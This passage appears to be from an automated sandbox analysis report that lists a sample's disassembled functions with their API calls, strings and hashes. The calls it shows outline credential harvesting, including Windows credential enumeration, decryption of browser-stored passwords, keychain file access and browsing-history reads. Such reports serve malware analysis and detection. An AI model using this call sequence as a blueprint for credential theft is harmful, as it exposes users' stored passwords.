                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                • _wcsicmp.MSVCRT ref: 0040DED8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                • memset.MSVCRT ref: 0040DF5F
                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                • API String ID: 594330280-3398334509
                                • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413D4C, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                • memset.MSVCRT ref: 00413D7F
                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                • memset.MSVCRT ref: 00413E07
                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                • API String ID: 912665193-1740548384
                                • Opcode ID: e401d52922480be3eaf0b3ab95a9c76bb2f446a8857850aee1ddd733cfe0f802
                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                • Opcode Fuzzy Hash: e401d52922480be3eaf0b3ab95a9c76bb2f446a8857850aee1ddd733cfe0f802
                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B58D, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                • memcpy.MSVCRT ref: 0040B60D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                • String ID: AE$BIN
                                • API String ID: 1668488027-3931574542
                                • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418758, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                • String ID:
                                • API String ID: 2947809556-0
                                • Opcode ID: e9fa8cdb0503d843af4e6d4979f9032e8967895c6ef67b6505ea85934ab3b907
                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                • Opcode Fuzzy Hash: e9fa8cdb0503d843af4e6d4979f9032e8967895c6ef67b6505ea85934ab3b907
                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404423, Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 767404330-0
                                • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AE51, Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileFind$FirstNext
                                • String ID:
                                • API String ID: 1690352074-0
                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418981, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0041898C
                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InfoSystemmemset
                                • String ID:
                                • API String ID: 3558857096-0
                                • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044553B, Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004455C2
                                • wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 0044570D
                                • memset.MSVCRT ref: 00445725
                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                • memset.MSVCRT ref: 0044573D
                                • memset.MSVCRT ref: 00445755
                                • memset.MSVCRT ref: 004458CB
                                • memset.MSVCRT ref: 004458E3
                                • memset.MSVCRT ref: 0044596E
                                • memset.MSVCRT ref: 00445A10
                                • memset.MSVCRT ref: 00445A28
                                • memset.MSVCRT ref: 00445AC6
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                • memset.MSVCRT ref: 00445B52
                                • memset.MSVCRT ref: 00445B6A
                                • memset.MSVCRT ref: 00445C9B
                                • memset.MSVCRT ref: 00445CB3
                                • _wcsicmp.MSVCRT ref: 00445D56
                                • memset.MSVCRT ref: 00445B82
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                • memset.MSVCRT ref: 00445986
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                • API String ID: 2151808875-3798722523
                                • Opcode ID: a8a9c9f223d915074a987403ed35d7f77e23cb5200639607a198e1b91b865fee
                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                • Opcode Fuzzy Hash: a8a9c9f223d915074a987403ed35d7f77e23cb5200639607a198e1b91b865fee
                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041276D, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                • String ID: $/deleteregkey$/savelangfile
                                • API String ID: 2744995895-28296030
                                • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B6EF, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                • wcsrchr.MSVCRT ref: 0040B738
                                • memset.MSVCRT ref: 0040B756
                                • memset.MSVCRT ref: 0040B7F5
                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                • memset.MSVCRT ref: 0040B851
                                • memset.MSVCRT ref: 0040B8CA
                                • memcmp.MSVCRT ref: 0040B9BF
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                • memset.MSVCRT ref: 0040BB53
                                • memcpy.MSVCRT ref: 0040BB66
                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                • String ID: chp$v10
                                • API String ID: 580435826-2783969131
                                • Opcode ID: 5e147a3699f376e8ab633f9d09c5abb4e2fa433231be96269332ca0cffc53aec
                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                • Opcode Fuzzy Hash: 5e147a3699f376e8ab633f9d09c5abb4e2fa433231be96269332ca0cffc53aec
                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E01E, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                • String ID: bhv
                                • API String ID: 3399910952-2689659898
                                • Opcode ID: 31268b28b02b0f0f5ddb4f3c3498909315dc08a91966dbcc90a29e268abf3bd7
                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                • Opcode Fuzzy Hash: 31268b28b02b0f0f5ddb4f3c3498909315dc08a91966dbcc90a29e268abf3bd7
                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413F4F, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                • API String ID: 2941347001-70141382
                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C274, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                • wcschr.MSVCRT ref: 0040C324
                                • wcschr.MSVCRT ref: 0040C344
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                • GetLastError.KERNEL32 ref: 0040C373
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
